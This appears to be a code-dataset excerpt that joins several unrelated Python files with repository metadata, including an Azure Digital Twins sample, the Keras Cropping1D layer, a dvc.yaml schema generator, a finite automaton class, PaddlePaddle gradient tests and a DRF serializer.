"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SearchHisMeetingsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
d94e881b7392a797a21413588260985a5b523625
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/digitaltwins/azure-mgmt-digitaltwins/generated_samples/digital_twins_put_with_public_network_access.py
|
f83ed93ccc50f1aa7c7d34e29e6c867c534c64f5
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 |
MIT
| 2023-09-14T21:48:49 | 2012-04-24T16:46:12 |
Python
|
UTF-8
|
Python
| false | false | 1,775 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.digitaltwins import AzureDigitalTwinsManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-digitaltwins
# USAGE
python digital_twins_put_with_public_network_access.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = AzureDigitalTwinsManagementClient(
credential=DefaultAzureCredential(),
subscription_id="50016170-c839-41ba-a724-51e9df440b9e",
)
response = client.digital_twins.begin_create_or_update(
resource_group_name="resRg",
resource_name="myDigitalTwinsService",
digital_twins_create={"location": "WestUS2", "properties": {"publicNetworkAccess": "Enabled"}},
).result()
print(response)
# x-ms-original-file: specification/digitaltwins/resource-manager/Microsoft.DigitalTwins/stable/2023-01-31/examples/DigitalTwinsPut_WithPublicNetworkAccess.json
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
6e6adb4ac5f39c2697616a67a264d17e179d9eef
|
e112fb4549c00a77530b32c67c748d66c19a4f87
|
/ex14.py
|
4d0c00f540374edd2b21c714349eb91b5b84b049
|
[] |
no_license
|
XinCui2018/Python-Hard-Way
|
1abff62cc7a7027affb6bcdb467fc0cb7fba127a
|
05f338a16aec58485c643d3156768aa87bb414ec
|
refs/heads/master
| 2022-10-11T13:34:11.972437 | 2020-06-08T13:05:13 | 2020-06-08T13:05:13 | 270,669,812 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,135 |
py
|
# from sys import argv
# script, user_name = argv
# prompt = '> '
# print ("Hi %s, I'm the %s script." % (user_name, script))
# print ("I'd like to ask you a few questions.")
# print ("Do you like me %s?" % user_name)
# likes = input(prompt)
# print ("Where do you live %s?" % user_name)
# lives = input(prompt)
# print ("What kind of computer do you have?")
# computer = input(prompt)
# print ("""
# Alright, so you said %r about liking me.
# You live in %r. Not sure where that is.
# And you have a %r computer. Nice.
# """ % (likes, lives, computer))
from sys import argv
script, user_name = argv
prompt = '> '
print ("Hi %s, this is the %s script." %(user_name, script))
print ("Can I ask you some questions?")
print ("Do you like me, %s?" % user_name)
likes = input(prompt)
print ("Where do you live, %s?" % user_name)
lives = input(prompt)
print ("What kind of computer do you use?")
computer = input(prompt)
print ("""
Alright, you said %r about liking me.
You live in %r, do not know where that is.
You have a %r computer. It is awesome.
""" % (likes, lives, computer))
|
[
"[email protected]"
] | |
3d64a5bfed4cc338ce7b38db5ada112fe517c445
|
dfd51748ba20c9af87925f30db1cd283fb5554f6
|
/invenio_rdm_records/services/components/relations.py
|
0b83ec0fe8c3975b0baf477b1c3e2ba6486a11da
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
ppanero/invenio-rdm-records
|
6daf38464755b04d33fd706148b7001a3c2500a9
|
b4bcc2e16df6048149177a6e1ebd514bdb6b0626
|
refs/heads/master
| 2023-06-07T22:14:07.678463 | 2022-04-01T13:06:46 | 2022-04-01T13:06:46 | 206,281,822 | 0 | 0 |
MIT
| 2022-03-24T09:20:25 | 2019-09-04T09:25:28 |
Python
|
UTF-8
|
Python
| false | false | 683 |
py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 CERN.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""RDM service component for metadata."""
from copy import copy
from invenio_drafts_resources.services.records.components import \
ServiceComponent
class RelationsComponent(ServiceComponent):
"""Base service component."""
def read(self, identity, record=None):
"""Read record handler."""
record.relations.dereference()
def read_draft(self, identity, draft=None):
"""Read draft handler."""
draft.relations.dereference()
|
[
"[email protected]"
] | |
b010f851ace9d560f4744da9777c12ef58ecc805
|
96a34a048c783a75736bf0ec775df22142f9ee53
|
/packages/service-library/src/servicelib/docker_utils.py
|
0a1e3c094b6d77ab5579293a2b2d6b49970d63c3
|
[
"MIT"
] |
permissive
|
ITISFoundation/osparc-simcore
|
77e5b9f7eb549c907f6ba2abb14862154cc7bb66
|
f4c57ffc7b494ac06a2692cb5539d3acfd3d1d63
|
refs/heads/master
| 2023-08-31T17:39:48.466163 | 2023-08-31T15:03:56 | 2023-08-31T15:03:56 | 118,596,920 | 39 | 29 |
MIT
| 2023-09-14T20:23:09 | 2018-01-23T10:48:05 |
Python
|
UTF-8
|
Python
| false | false | 532 |
py
|
from datetime import datetime
import arrow
def to_datetime(docker_timestamp: str) -> datetime:
# docker follows RFC3339Nano timestamp which is based on ISO 8601
# https://medium.easyread.co/understanding-about-rfc-3339-for-datetime-formatting-in-software-engineering-940aa5d5f68a
# This is acceptable in ISO 8601 and RFC 3339 (with T)
# 2019-10-12T07:20:50.52Z
# This is only accepted in RFC 3339 (without T)
# 2019-10-12 07:20:50.52Z
dt: datetime = arrow.get(docker_timestamp).datetime
return dt
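# Minimal usage sketch added for illustration; the timestamp is an example
# RFC3339Nano value of the kind returned by the Docker engine API.
if __name__ == "__main__":
    print(to_datetime("2019-10-12T07:20:50.52Z"))  # 2019-10-12 07:20:50.520000+00:00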
|
[
"[email protected]"
] | |
fb890dc580eea9b0adef48e5e1e80d3eb610ab9a
|
ce0161fbfc57221e99d06c33d805c920b78b0668
|
/venv/bin/flask
|
b74e3568d1128d71494d18916f991e8b803d704a
|
[] |
no_license
|
faizan2590/Energy_Tariff_Selection
|
b72815178231b71441e46a30cdbdedbffc3a23c5
|
fbf3c9103c3248051f93e8ef626d8f04763fe6e8
|
refs/heads/master
| 2021-10-13T13:59:18.780578 | 2021-10-04T19:04:02 | 2021-10-04T19:04:02 | 118,249,172 | 0 | 0 | null | 2021-10-04T19:04:03 | 2018-01-20T14:18:05 |
Python
|
UTF-8
|
Python
| false | false | 285 |
#!/Users/muhammad.faizan/Dropbox/Blockchain(MAC)/Energy_Tariff_Selection/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
0c6cb54ad19b2cdaa6b81ab6851c9972fa85bc7a
|
aee4c0839933a11d8ce3c485d06595202dd3cabd
|
/keras/layers/reshaping/cropping1d.py
|
2eb632e38d0ae45a148bb71d27c864c72c325578
|
[
"Apache-2.0"
] |
permissive
|
xiaoheilong3112/keras
|
fc3025a2f14838bf8416b2faed766cb43da62f9b
|
8d5e9b2163ec9b7d9f70920d1c7992b6df6820ec
|
refs/heads/master
| 2023-08-07T18:23:36.804563 | 2023-07-25T19:16:12 | 2023-07-25T19:16:48 | 137,238,629 | 1 | 0 |
Apache-2.0
| 2023-07-26T05:22:44 | 2018-06-13T15:59:45 |
Python
|
UTF-8
|
Python
| false | false | 3,256 |
py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras cropping layer for 1D input."""
import tensorflow.compat.v2 as tf
from keras.engine.base_layer import Layer
from keras.engine.input_spec import InputSpec
from keras.utils import conv_utils
# isort: off
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.layers.Cropping1D")
class Cropping1D(Layer):
"""Cropping layer for 1D input (e.g. temporal sequence).
It crops along the time dimension (axis 1).
Examples:
>>> input_shape = (2, 3, 2)
>>> x = np.arange(np.prod(input_shape)).reshape(input_shape)
>>> print(x)
[[[ 0 1]
[ 2 3]
[ 4 5]]
[[ 6 7]
[ 8 9]
[10 11]]]
>>> y = tf.keras.layers.Cropping1D(cropping=1)(x)
>>> print(y)
tf.Tensor(
[[[2 3]]
[[8 9]]], shape=(2, 1, 2), dtype=int64)
Args:
cropping: Int or tuple of int (length 2)
How many units should be trimmed off at the beginning and end of
the cropping dimension (axis 1).
If a single int is provided, the same value will be used for both.
Input shape:
3D tensor with shape `(batch_size, axis_to_crop, features)`
Output shape:
3D tensor with shape `(batch_size, cropped_axis, features)`
"""
def __init__(self, cropping=(1, 1), **kwargs):
super().__init__(**kwargs)
self.cropping = conv_utils.normalize_tuple(
cropping, 2, "cropping", allow_zero=True
)
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
input_shape = tf.TensorShape(input_shape).as_list()
if input_shape[1] is not None:
length = input_shape[1] - self.cropping[0] - self.cropping[1]
else:
length = None
return tf.TensorShape([input_shape[0], length, input_shape[2]])
def call(self, inputs):
if (
inputs.shape[1] is not None
and sum(self.cropping) >= inputs.shape[1]
):
raise ValueError(
"cropping parameter of Cropping layer must be "
"greater than the input shape. Received: inputs.shape="
f"{inputs.shape}, and cropping={self.cropping}"
)
if self.cropping[1] == 0:
return inputs[:, self.cropping[0] :, :]
else:
return inputs[:, self.cropping[0] : -self.cropping[1], :]
def get_config(self):
config = {"cropping": self.cropping}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
|
[
"[email protected]"
] | |
f7cd7780e8a21e7a258c04a2754208c931442142
|
00edbfdc13b5cba7bd4f52bccda63dd7f09a5961
|
/gen.py
|
e108c6a1a086c30e1293b46be447ec5901d00ffb
|
[
"Apache-2.0"
] |
permissive
|
hercules261188/dvcyaml-schema
|
796f7b6900baf9e0ce4b9102d3386b0326f95763
|
724d2ba40d13978334f53f988b19b2b7510bad97
|
refs/heads/master
| 2022-12-03T02:52:20.193279 | 2020-08-16T06:16:01 | 2020-08-16T06:16:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,994 |
py
|
"""schema.json generator."""
# flake8: noqa: D1
# pylint: disable=unused-import,missing-class-docstring,too-few-public-methods
try:
from typing import TypedDict
except ImportError:
from typing_extensions import TypedDict # noqa: F401
from typing import Any, Dict, Optional, Set, Union
from pydantic import BaseModel, Field
# aliases
FilePath = str
ParamKey = str
StageName = str
class OutFlags(BaseModel):
cache: Optional[bool] = Field(True, description="Cache output by DVC")
persist: Optional[bool] = Field(
False, description="Persist output between runs"
)
class PlotFlags(OutFlags):
x: str = Field(
None, description="Default field name to use as x-axis data"
)
y: str = Field(
None, description="Default field name to use as y-axis data"
)
x_label: str = Field(None, description="Default label for the x-axis")
y_label: str = Field(None, description="Default label for the y-axis")
title: str = Field(None, description="Default plot title")
header: bool = Field(
False, description="Whether the target CSV or TSV has a header or not"
)
template: str = Field(None, description="Default plot template")
class DepModel(BaseModel):
__root__: FilePath = Field(..., description="A dependency for the stage")
class Dependencies(BaseModel):
__root__: Set[DepModel]
class CustomParamFileKeys(BaseModel):
__root__: Dict[FilePath, Set[ParamKey]]
class Param(BaseModel):
__root__: Union[ParamKey, CustomParamFileKeys]
class Params(BaseModel):
__root__: Set[Param]
class Out(BaseModel):
__root__: Union[FilePath, Dict[FilePath, OutFlags]]
class Outs(BaseModel):
__root__: Set[Out]
class Plot(BaseModel):
__root__: Union[FilePath, Dict[FilePath, PlotFlags]]
class Plots(BaseModel):
__root__: Set[Plot]
class Stage(BaseModel):
cmd: str = Field(..., description="Command to run")
wdir: Optional[str] = Field(None, description="Working directory")
deps: Optional[Dependencies] = Field(
None, description="Dependencies for the stage"
)
params: Optional[Params] = Field(None, description="Params for the stage")
outs: Optional[Outs] = Field(None, description="Outputs of the stage")
metrics: Optional[Outs] = Field(None, description="Metrics of the stage")
plots: Optional[Plots] = Field(None, description="Plots of the stage")
frozen: Optional[bool] = Field(
False, description="Assume stage as unchanged"
)
always_changed: Optional[bool] = Field(
False, description="Assume stage as always changed"
)
meta: Any = Field(None, description="Additional information/metadata")
class Config:
allow_mutation = False
Stages = Dict[StageName, Stage]
class DvcYamlModel(BaseModel):
stages: Stages = Field(..., description="List of stages")
class Config:
title = "dvc.yaml"
if __name__ == "__main__":
print(DvcYamlModel.schema_json(indent=2))
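    # --- Editor's addition (illustrative only): the schema can also be inspected
    # as a plain dict, e.g. to list the stage fields documented above.
    schema = DvcYamlModel.schema()
    print(sorted(schema["definitions"]["Stage"]["properties"]))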
|
[
"[email protected]"
] | |
e7ddcf7210f3b09dba848c793ab03efad8fdb443
|
c90cab17679a44aba7e4b74e83d1b15cd8778051
|
/mgj/migrations/0002_productdetail.py
|
7546f098f8300a0cfaed0d697e03fd13ca547cdf
|
[] |
no_license
|
code5257/mgj
|
3327edf9a8ea0613053c3ca04b850adc946ac2d7
|
da9ef5fdc335fdc0ecdf3b904824d6ca1044e6c5
|
refs/heads/master
| 2020-04-28T23:32:31.032096 | 2019-03-19T08:59:31 | 2019-03-19T08:59:31 | 175,658,585 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 970 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2019-03-14 12:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mgj', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Productdetail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=100)),
('smallImg', models.CharField(max_length=100)),
('name', models.CharField(max_length=100)),
('price', models.FloatField()),
('sales', models.CharField(max_length=100)),
('oldprice', models.FloatField()),
('store', models.IntegerField()),
('background', models.CharField(max_length=100)),
],
),
]
|
[
"[email protected]"
] | |
150bc75088e264799314b9e8e52e15be34713791
|
3c7eceeae8c5472ea9d5dc54d910730de935b8e9
|
/api/user/migrations/0002_auto_20200331_1553.py
|
ced7c3c8164dfc7da5e4f076cc74b98b1f71bb82
|
[] |
no_license
|
mkwiatek770/mind-battle
|
dd827556801b9b70f8a400e58c0de31a46f6d3b5
|
158b8c50df5b5eed671f33fab722ebd9d1309070
|
refs/heads/master
| 2023-01-20T18:10:41.716987 | 2020-04-10T18:25:52 | 2020-04-10T18:25:52 | 247,666,836 | 0 | 0 | null | 2023-01-05T17:07:53 | 2020-03-16T09:56:18 |
Python
|
UTF-8
|
Python
| false | false | 541 |
py
|
# Generated by Django 3.0.4 on 2020-03-31 13:53
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('quiz', '0004_auto_20200331_1154'),
('user', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='QuestionUser',
new_name='UserAnswer',
),
migrations.AlterModelOptions(
name='useranswer',
options={'verbose_name': 'UserAnswer', 'verbose_name_plural': 'UserAnswers'},
),
]
|
[
"[email protected]"
] | |
cf3c3b21e8f5b7399fd8217db7c45097ed017be8
|
1279665ee0d6730580b8989b723744cdc90c5148
|
/TreeNode.py
|
7d094ad16915aae185263a3ae64f753238d3c840
|
[] |
no_license
|
danielkiselev/Translator_Python
|
003b3f87649618caedb772be4fb55e3b65f02055
|
93260641837df56a02c3930adaf2d72877d33984
|
refs/heads/master
| 2020-04-08T01:00:38.254113 | 2018-11-23T21:24:54 | 2018-11-23T21:24:54 | 158,877,503 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 198 |
py
|
class treeNode:
def __init__(self, data, code):
self.data = data
self.code = code
self.children = []
def addChild(self, child):
self.children.append(child)
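# --- Editor's addition: a minimal, self-contained usage sketch (not part of the
# original translator code).
if __name__ == "__main__":
    root = treeNode("program", 0)
    root.addChild(treeNode("stmt", 1))
    root.addChild(treeNode("expr", 2))
    for child in root.children:
        print(child.data, child.code)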
|
[
"[email protected]"
] | |
f1c51004af2b9f3170c829e779a17aace310e803
|
645ef293d840c96e987596189acf62b4537bd9cd
|
/lab2/components/finite_automaton.py
|
21be7a9c2a9ed266fbab0fcee2cb886568ef642b
|
[] |
no_license
|
vivere-dally/ubb_y3_lftc
|
86b04b4f3c93efd72a2d8bcf1835850682dbf932
|
a7a7060f62ba5074e853ca19435b0297b3817d0d
|
refs/heads/main
| 2023-02-09T09:16:37.693965 | 2021-01-05T17:13:27 | 2021-01-05T17:13:27 | 304,396,899 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,678 |
py
|
import components.transition as trans
class FiniteAutomaton:
"""Class that represents a finite automaton.
"""
def __init__(self, alphabet: list, states: list, initial_state: str, final_states: list, transitions: dict):
"""Initializes a finite automaton class.
Args:
alphabet (list): a list of strings that represents the alphabet e.g. ["0", "1", "2"]
states (list): a list of strings that represents all the states in the FA
initial_state (str): a string that represents a state which is the entry point in the automaton. E.g. q0
final_states (list): a list of strings that represent the final states. E.g. ["q0","q1","q2"]
transitions (dict): a dictionary with key string and value list of components.transition.Transition. I.e. from state i you can go to states 1..n.
"""
self.alphabet = alphabet
self.states = states
self.initial_state = initial_state
self.final_states = final_states
self.transitions = transitions
def __repr__(self):
all_trans = ""
for state in self.states:
for transition in self.transitions.get(state, []):
all_trans += f"\nfrom {state} {transition}"
return f"States: {self.states}\nAlphabet: {self.alphabet}\nTransitions: {all_trans}\nFinal states: {self.final_states}\n"
def check_sequence(self, sequence: str) -> bool:
"""Checks if a sequence of numbers is accepted by the finite automaton.
Args:
sequence (str): the str of numbers to move from one state to another
Returns:
bool: true if the sequence is accepted, false otherwise
"""
is_accepted = True
current_state = self.initial_state
for number in sequence:
if number not in self.alphabet:
print(f"{number} not in alphabet. Continue...")
is_accepted = False
continue
current_state_changed = False
for transition in self.transitions.get(current_state, []):
if transition.number == number:
print(f"from {current_state} {transition}")
current_state = transition.state
current_state_changed = True
break
if not current_state_changed:
print(
f"no transition from {current_state} with {number}. Continue...")
is_accepted = False
if current_state not in self.final_states:
return False
return is_accepted
def get_longest_prefix(self, sequence: str) -> str:
"""Returns the longest prefix of numbers that is accepted by the finite automaton.
Args:
sequence (str): the string of numbers to move from one state to another
Returns:
str: the longest prefix
"""
current_state = self.initial_state
prefix_end_index = 0
for number in sequence:
if number not in self.alphabet:
break
current_state_changed = False
for transition in self.transitions.get(current_state, []):
if transition.number == number:
current_state = transition.state
current_state_changed = True
break
if not current_state_changed:
break
prefix_end_index += 1
prefix = sequence[:prefix_end_index]
        while prefix and not self.check_sequence(prefix):
prefix = prefix[:-1]
return prefix
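# --- Editor's addition: illustrative usage sketch. FiniteAutomaton only needs
# transition objects exposing `.number` and `.state`, so a namedtuple stands in
# for components.transition.Transition here (its real constructor is not shown
# in this file and is therefore an assumption).
if __name__ == "__main__":
    from collections import namedtuple

    T = namedtuple("T", ["number", "state"])
    # Accepts binary strings ending in "1": q1 is the only final state.
    fa = FiniteAutomaton(
        alphabet=["0", "1"],
        states=["q0", "q1"],
        initial_state="q0",
        final_states=["q1"],
        transitions={
            "q0": [T("0", "q0"), T("1", "q1")],
            "q1": [T("0", "q0"), T("1", "q1")],
        },
    )
    print(fa.check_sequence("1011"))  # True: ends in state q1
    print(fa.check_sequence("10"))    # False: ends in state q0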
|
[
"[email protected]"
] | |
aafbdb21c87f6b9bcfb133a11bf516bbee634e83
|
d5f75adf5603927396bdecf3e4afae292143ddf9
|
/python/paddle/fluid/tests/unittests/test_custom_grad_input.py
|
2d12243de52c0603918edf5a2945617621b5d4f0
|
[
"Apache-2.0"
] |
permissive
|
jiweibo/Paddle
|
8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4
|
605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74
|
refs/heads/develop
| 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 |
Apache-2.0
| 2023-04-04T02:42:53 | 2019-07-11T03:51:12 |
Python
|
UTF-8
|
Python
| false | false | 6,613 |
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle
import paddle.fluid.dygraph as dg
from op_test import OpTest
from paddle.fluid.framework import _test_eager_guard
class TestTensorBackward(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if paddle.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def func_tensor_backward(self):
for dtype in self._dtypes:
x = np.random.random([2, 100]).astype(dtype)
y = np.random.random([100, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
z_tensor.backward(grad_tensor)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_tensor_backward(self):
with _test_eager_guard():
self.func_tensor_backward()
self.func_tensor_backward()
class TestBackwardAPI(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if paddle.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def func_backward_api(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
z_tensor2 = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
paddle.autograd.backward([z_tensor1, z_tensor2],
[grad_tensor, grad_tensor], True)
x_grad = np.matmul(grad, y.T)
self.assertTrue(
np.allclose(x_grad * 2, x_tensor.grad.numpy()))
def test_backward_api(self):
with _test_eager_guard():
self.func_backward_api()
self.func_backward_api()
def func_backward_single_tensor(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
paddle.autograd.backward(z_tensor1, grad_tensor, True)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_single_tensor(self):
with _test_eager_guard():
self.func_backward_single_tensor()
self.func_backward_single_tensor()
def func_backward_none_grad_tensor(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.ones(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
paddle.autograd.backward(z_tensor1, None)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_none_grad_tensor(self):
with _test_eager_guard():
self.func_backward_none_grad_tensor()
self.func_backward_none_grad_tensor()
def func_backward_accumulator_with_init_grad(self):
for dtype in self._dtypes:
x = np.random.random([
10,
]).astype(dtype)
y_grad = np.random.random([
10,
]).astype(dtype)
z_grad = np.random.random([
10,
]).astype(dtype)
self._places = [paddle.CPUPlace()]
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = x_tensor**2
z_tensor = y_tensor**3
y_grad_tensor = paddle.to_tensor(y_grad)
z_grad_tensor = paddle.to_tensor(z_grad)
paddle.autograd.backward([y_tensor, z_tensor],
[y_grad_tensor, z_grad_tensor])
y = x**2
z = x**3
x_grad = 2 * x * (y_grad + 3 * y * y * z_grad)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_accumulator_with_init_grad(self):
with _test_eager_guard():
self.func_backward_accumulator_with_init_grad()
self.func_backward_accumulator_with_init_grad()
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
047391e1ff8cbb03e8117646a3fc4005c9504adf
|
26d8f17871e2eedd68a3b5acf9f1c9a7aca3cb08
|
/snippets/serializers.py
|
863e0674a56574d113dee52f8eb245fa2319ad05
|
[] |
no_license
|
django-learning/drf_tutiroal
|
b5e713b9768e721f622dfe2d467b270a3762112e
|
2b7f1bd440cd86fd34b2fc3670aea5083bcdf5b8
|
refs/heads/master
| 2022-12-11T18:17:03.403092 | 2019-12-05T13:37:19 | 2019-12-05T13:37:19 | 226,109,972 | 0 | 0 | null | 2022-04-22T22:54:39 | 2019-12-05T13:35:24 |
Python
|
UTF-8
|
Python
| false | false | 1,121 |
py
|
from rest_framework import serializers
from .models import LANGUAGE_CHOICES, STYLE_CHOICES, Snippet
class SnippetSerializer(serializers.Serializer):
pk = serializers.IntegerField(read_only=True)
title = serializers.CharField(required=False, allow_blank=True, max_length=100)
    code = serializers.CharField(style={"base_template": "textarea.html"})
linenos = serializers.BooleanField(required=False)
language = serializers.ChoiceField(choices=LANGUAGE_CHOICES, default='python')
style = serializers.ChoiceField(choices=STYLE_CHOICES, default="friendly")
    def create(self, validated_data):
        return Snippet.objects.create(**validated_data)
    def update(self, instance, validated_data):
        instance.title = validated_data.get("title", instance.title)
        instance.code = validated_data.get("code", instance.code)
        instance.linenos = validated_data.get("linenos", instance.linenos)
        instance.language = validated_data.get("language", instance.language)
        instance.style = validated_data.get("style", instance.style)
        instance.save()
return instance
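# --- Editor's addition: illustrative usage, kept as a comment because it needs a
# configured Django project (e.g. run inside `python manage.py shell`).
#
#     serializer = SnippetSerializer(data={"code": "print('hello, world')"})
#     serializer.is_valid(raise_exception=True)
#     snippet = serializer.save()                       # calls .create() above
#     serializer = SnippetSerializer(snippet, data={"code": "pass"})
#     serializer.is_valid(raise_exception=True)
#     serializer.save()                                 # calls .update() above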
|
[
"[email protected]"
] | |
53970fe6d10e8cec87714991c66d5b2bb83a9d35
|
70940d64dad504f50f0cb6d517aeff495f2eeccb
|
/prefork/server.py
|
ecd38221a5a4b05a8edde489c7211d775091a08b
|
[] |
no_license
|
wd055/technopark_highload_hm2
|
f9c6b10022daf2cdae030478dbceb05794343f3a
|
dfece88623e3007af4a410330561edf48db9df02
|
refs/heads/master
| 2023-08-02T13:58:51.225652 | 2021-09-25T20:57:35 | 2021-09-25T20:57:35 | 410,105,738 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,975 |
py
|
import asyncio
import atexit
import os
import signal
import socket
import uvloop as uvloop
from utils import config, request, response
async def handle(sock):
raw = await asyncio.get_event_loop().sock_recv(sock, 1024)
req = request.Request(raw.decode('utf-8'))
result_code = req.parse_request()
resp = response.Response(
req.method, req.url, req.protocol, req.filepath, result_code)
await resp.send(sock)
class Server:
def __init__(self):
self.host = config.HOST
self.port = config.PORT
self.address = f'{self.host}:{self.port}'
self.server_socket = None
self.process_pull = []
atexit.register(self.kill_children)
def run_socket(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((self.host, self.port))
server_socket.listen()
server_socket.setblocking(False)
